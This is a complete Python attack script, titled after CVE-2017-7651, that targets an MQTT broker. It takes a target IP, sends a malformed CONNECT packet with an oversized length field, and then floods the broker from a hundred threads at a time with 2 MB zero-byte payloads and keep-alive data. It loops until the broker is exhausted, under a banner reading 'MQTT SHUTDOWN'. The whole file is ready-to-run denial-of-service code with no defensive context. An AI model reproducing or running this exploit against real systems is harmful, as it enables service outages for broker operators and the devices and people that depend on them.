CVE-2017-7651.py

import socket
import threading
import time
import sys

host = None
port = 1883
run = True
fails = 0
thclosed = 0
thcreated = 0
payload = None
keeppayload = None
initpayload = b'\x10\xff\xff\xff\x0f\x00\x04\x4d\x51\x54\x54\x04\x02\x00\x0a\x00\x10\x43\x36\x38\x4e\x30\x31\x77\x75\x73\x4a\x31\x66\x78\x75\x38\x58'
seconds = 1

def send_attack():
    global fails, thclosed
    try:
        this_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        this_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    except socket.error:
        fails += 1
        return

    try:
        this_socket.connect((host, port))
    except socket.error:
        fails += 1
        this_socket.close()
        return

    try:
        this_socket.sendall(initpayload)
    except socket.error:
        fails += 1
        this_socket.close()
        return

    try:
        for _ in range(15):
            this_socket.sendall(payload)
            time.sleep(0.1 * seconds)

        while True:
            this_socket.sendall(keeppayload)
            time.sleep(0.3 * seconds)
    except socket.error:
        pass
    finally:
        thclosed += 1
        this_socket.close()

def main():
    global host, payload, keeppayload, thcreated, run

    print("\033[92m\n              ___\n             (  \">" 
          "\n              )(\n             // ) MQTT SHUTDOWN\n          --//\"\"--"
          "\n          -/------\n\033[39m\n")

    if len(sys.argv) < 2:
        host = input("Target IP: ")
    else:
        host = sys.argv[1]

    print(f"Using Target IP= {host}")

    payload = b'\x00' * 2097152
    keeppayload = b'\x00' * 1024

    input("Press Enter to Start Attack\n")
    print("Starting Attack")
    
    threads = []

    while run:
        for _ in range(100):
            try:
                thread = threading.Thread(target=send_attack)
                thread.start()
                threads.append(thread)
            except Exception as e:
                print(e)
        
        thcreated += 1
        time.sleep(5 * seconds)
        
        print("\n======Status=======\n")
        print(f"{thcreated * 100} threads created")
        print(f"{thclosed} closed threads")
        print(f"{fails} fails threads")
        print(f"{thcreated * 100 - thclosed - fails} running threads")

        if thcreated * 100 - thclosed - fails < 50:
            run = False

        time.sleep(55 * seconds)
    
    print("Attack finished...")

if __name__ == "__main__":
    main()